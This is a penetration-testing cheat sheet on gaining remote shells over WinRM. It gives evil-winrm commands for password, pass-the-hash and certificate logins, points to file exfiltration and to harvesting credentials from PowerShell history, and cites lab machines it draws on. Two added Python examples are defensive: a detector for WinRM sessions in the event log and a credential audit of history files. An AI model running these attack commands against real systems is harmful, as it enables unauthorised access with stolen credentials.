# WinRM Exploitation
## Overview
Windows Remote Management (WinRM) on ports 5985 (HTTP) and 5986 (HTTPS) is Microsoft's implementation of the WS-Management protocol. It provides a PowerShell-based remote shell and is commonly enabled on servers for administration. WinRM accepts plaintext passwords, NTLM hashes (PTH), and certificates, making it one of the most versatile remote access vectors. Users in the "Remote Management Users" group can authenticate.
## Prerequisites
- evil-winrm (Ruby gem)
- Valid credentials (username/password) or NTLM hash
- Alternatively: PowerShell Enter-PSSession / Invoke-Command from a Windows attacker machine
- netexec for WinRM credential validation
## Detection & Enumeration
```bash
nmap -p 5985,5986 -sV <IP>                 # Service detection
netexec winrm <IP> -u <user> -p <pass>     # Test credentials
netexec winrm <IP> -u <user> -H <hash>     # Test with NTLM hash
```
## Exploitation / Execution
### evil-winrm with Password
```bash
evil-winrm -i <IP> -u <user> -p '<password>'      # Basic connection
evil-winrm -i <IP> -u <user> -p '<password>' -S   # Use SSL (port 5986)
```
### evil-winrm with NTLM Hash (Pass-the-Hash)
```bash
evil-winrm -i <IP> -u <user> -H <NTLM_hash>       # PTH over WinRM
evil-winrm -i sequel.htb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
```
### evil-winrm with Certificate
Certificates extracted from PFX files (e.g., from SMB shares) can authenticate to WinRM over SSL:
```bash
# Extract key and certificate from PFX
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem
# Authenticate
evil-winrm -i <IP> -c cert.pem -k key.pem -S      # -S for SSL (port 5986)
```
### PowerShell Remoting (from Windows)
```powershell
# Create a PSCredential object
$secpass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<domain>\<user>', $secpass)
# Interactive session
Enter-PSSession -ComputerName <IP> -Credential $cred
# Execute single command
Invoke-Command -ComputerName <IP> -Credential $cred -ScriptBlock { whoami }
```
### File Upload / Download via evil-winrm
```bash
# Within evil-winrm session:
upload /path/to/local/file.exe          # Upload to target
download C:\path\to\remote\file.txt     # Download from target
```
### Bypassing SSL Certificate Validation
```powershell
$sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck
Enter-PSSession -ComputerName <IP> -Credential $cred -SessionOption $sessionOption -UseSSL
```
## Common Pitfalls
- Warning: "Remote Management Users" group membership is required -- verify with net user <username>
- Warning: Double-hop problem -- credentials are not forwarded by default in multi-hop scenarios; use CredSSP or explicit credentials within the session
- Warning: Kerberos time skew -- ensure attacker clock is synced with DC: sudo ntpdate -u <DC_IP>
## OPSEC Considerations
- Shield: WinRM connections generate Event ID 4624 (logon) and 4634 (logoff) with Logon Type 3
- Shield: PowerShell activity is logged in Event ID 4104 (script block logging) and 4103 (module logging)
- Shield: evil-winrm connections show PowerShell host process (wsmprovhost.exe) creation
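The three log sources above correlate naturally: a Logon Type 3 event (4624), a wsmprovhost.exe process creation (4688) under the same Logon ID, and 4104 script blocks from that user shortly afterwards. The following is an added detection example written for this page, not code from the original cheat sheet or from the evil-winrm project. The event records are constructed samples, the flat field names (time, id, host, user, logon_type, logon_id, src_ip, auth_pkg, new_process, script_block) are an assumption about how a SIEM or ETL step has normalised the raw XML, and the 60-second window is an arbitrary tuning choice.

```python
"""Flag WinRM sessions by correlating Windows Security/PowerShell events.

Added example, not part of the original cheat sheet. Records are constructed
samples shaped like the fields of Event IDs 4624 (logon), 4688 (process
creation) and 4104 (script block logging); the flat field names are an
assumption about what a SIEM/ETL step has normalised them to.
"""
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry).
EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 4624, "host": "DC01",
     "user": "svc_backup", "logon_type": 3, "logon_id": "0x3E7A1",
     "src_ip": "10.10.14.5", "auth_pkg": "NTLM"},
    # 4688: wsmprovhost.exe started by the WinRM service; its Target Logon ID
    # (assumed normalised to "logon_id") equals the remote user's 4624 Logon ID.
    {"time": "2024-05-01T10:00:01", "id": 4688, "host": "DC01",
     "user": "svc_backup", "logon_id": "0x3E7A1",
     "new_process": "C:\\Windows\\System32\\wsmprovhost.exe",
     "parent_process": "C:\\Windows\\System32\\svchost.exe"},
    {"time": "2024-05-01T10:00:05", "id": 4104, "host": "DC01",
     "user": "svc_backup", "script_block": "whoami; Get-ChildItem C:\\Users"},
    # Ordinary type-3 logon (e.g. SMB) with no wsmprovhost spawn: not WinRM.
    {"time": "2024-05-01T10:02:00", "id": 4624, "host": "DC01",
     "user": "jdoe", "logon_type": 3, "logon_id": "0x41000",
     "src_ip": "10.10.20.7", "auth_pkg": "Kerberos"},
    # Interactive console logon (type 2): out of scope for this rule.
    {"time": "2024-05-01T10:03:00", "id": 4624, "host": "DC01",
     "user": "admin", "logon_type": 2, "logon_id": "0x42000",
     "src_ip": "-", "auth_pkg": "Negotiate"},
]

WINRM_HOST_PROCESS = "wsmprovhost.exe"
WINDOW = timedelta(seconds=60)  # assumed tuning value


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_winrm_sessions(events, window=WINDOW):
    """Return one finding per network logon (4624, Logon Type 3) that is
    followed within `window` by a wsmprovhost.exe creation (4688) carrying the
    same Logon ID on the same host. 4104 script blocks from that user on that
    host inside the window are attached as context."""
    logons = [e for e in events if e["id"] == 4624 and e.get("logon_type") == 3]
    spawns = [e for e in events if e["id"] == 4688
              and e.get("new_process", "").lower().endswith(WINRM_HOST_PROCESS)]
    scripts = [e for e in events if e["id"] == 4104]
    findings = []
    for lg in logons:
        t0 = _ts(lg)
        in_window = lambda e, t0=t0: t0 <= _ts(e) <= t0 + window
        spawn = next((s for s in spawns if s["host"] == lg["host"]
                      and s["logon_id"] == lg["logon_id"] and in_window(s)), None)
        if spawn is None:
            continue
        blocks = [s["script_block"] for s in scripts
                  if s["host"] == lg["host"] and s["user"] == lg["user"]
                  and in_window(s)]
        findings.append({
            "host": lg["host"], "user": lg["user"], "src_ip": lg["src_ip"],
            "auth_pkg": lg["auth_pkg"], "logon_id": lg["logon_id"],
            # NTLM authentication on a WinRM logon is what a pass-the-hash
            # session looks like in the log; Kerberos is the expected case.
            "ntlm": lg["auth_pkg"].upper() == "NTLM",
            "script_blocks": blocks,
        })
    return findings


if __name__ == "__main__":
    for f in find_winrm_sessions(EVENTS):
        print(f"WinRM session on {f['host']}: {f['user']} from {f['src_ip']} via "
              f"{f['auth_pkg']} (logon {f['logon_id']}), "
              f"{len(f['script_blocks'])} script block(s) captured")
```

The key is joining on (host, Logon ID) rather than on username alone, so that an unrelated SMB logon by the same user is not counted as a WinRM session; in a production rule the same join is expressed as a SIEM transaction and the NTLM flag plus source subnet becomes the alert severity.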
## Post-Exploitation Value
- Interactive PowerShell session with full command execution
- File upload/download capability for tool transfer and data exfiltration
- Session persistence (can reconnect without triggering new logon events each time)
- PowerShell history file may contain credentials: $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
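Because the PSReadLine history is a plain text file, the same fact cuts both ways: an auditor can sweep it for credentials that administrators left on the command line and get them rotated. The following is an added example written for this page, not code from the original cheat sheet. The history content is a constructed sample, and the regexes (ConvertTo-SecureString ... -AsPlainText, net use passwords, cmdkey /pass:, bare 32-hex NTLM hashes) are assumptions about how secrets commonly appear; extend them for your own estate.

```python
"""Audit a PSReadLine history file for embedded credentials.

Added example, not from the original page. The regexes are assumptions about
how secrets typically end up on a command line; extend them for your estate.
"""
import re
from pathlib import Path

# Constructed sample history (not taken from a real host).
SAMPLE_HISTORY = """\
Get-ChildItem C:\\Users
$secpass = ConvertTo-SecureString 'Winter2024!' -AsPlainText -Force
Enter-PSSession -ComputerName 10.10.10.5 -Credential $cred
net use \\\\fileserver\\share /user:corp\\jdoe P@ssw0rd
cmdkey /add:fileserver /user:corp\\backup /pass:Backup#99
Set-Location C:\\Temp
"""

# Each pattern captures the secret in the named group "secret".
PATTERNS = {
    "securestring_plaintext": re.compile(
        r"ConvertTo-SecureString\s+(['\"])(?P<secret>.+?)\1\s+-AsPlainText", re.I),
    "net_use_password": re.compile(
        r"\bnet\s+use\s+\S+\s+/user:\S+\s+(?P<secret>\S+)", re.I),
    "cmdkey_password": re.compile(r"/pass:(?P<secret>\S+)", re.I),
    "ntlm_hash": re.compile(r"\b(?P<secret>[0-9a-f]{32})\b", re.I),
}


def audit_history(text):
    """Return a finding per history line that matches a credential pattern,
    with the secret replaced by <REDACTED> so the report itself is safe."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            match = pattern.search(line)
            if match:
                secret = match.group("secret")
                findings.append({"line": lineno, "kind": kind,
                                 "redacted": line.replace(secret, "<REDACTED>")})
                break  # one finding per line is enough for triage
    return findings


def audit_file(path):
    """Audit a history file on disk (default PSReadLine location on Windows:
    %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt)."""
    return audit_history(Path(path).read_text(encoding="utf-8", errors="replace"))


if __name__ == "__main__":
    for f in audit_history(SAMPLE_HISTORY):
        print(f"line {f['line']:>3} [{f['kind']}] {f['redacted']}")
```

The report only ever carries the redacted line, so it can be filed in a ticket; the remediation is to rotate the exposed secret and clear the history, and the longer-term fix is to stop passing passwords on the command line (Get-Credential, a secret vault, or certificate authentication as in the evil-winrm certificate section above).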
## Cross-References
### Tool References
| Tool | Link |
|---|---|
| evil-winrm | https://github.com/Hackplayers/evil-winrm |
| netexec | https://github.com/Porchetta-Industries/CrackMapExec |
### Source Machines
- Blackfield (Hard, AD) - WinRM access with hash from lsass dump
- Cascade (Medium, AD) - WinRM login after TightVNC password decryption
- Escape (Medium, AD) - WinRM login after MSSQL hash capture and cracking
- Forest (Easy, AD) - WinRM login after ASREPRoasting svc-alfresco
- Return (Easy, AD) - WinRM after LDAP credential capture via printer panel
- Sauna (Easy, AD) - WinRM login after ASREPRoasting fsmith
- Timelapse (Easy, AD) - WinRM login using PFX certificate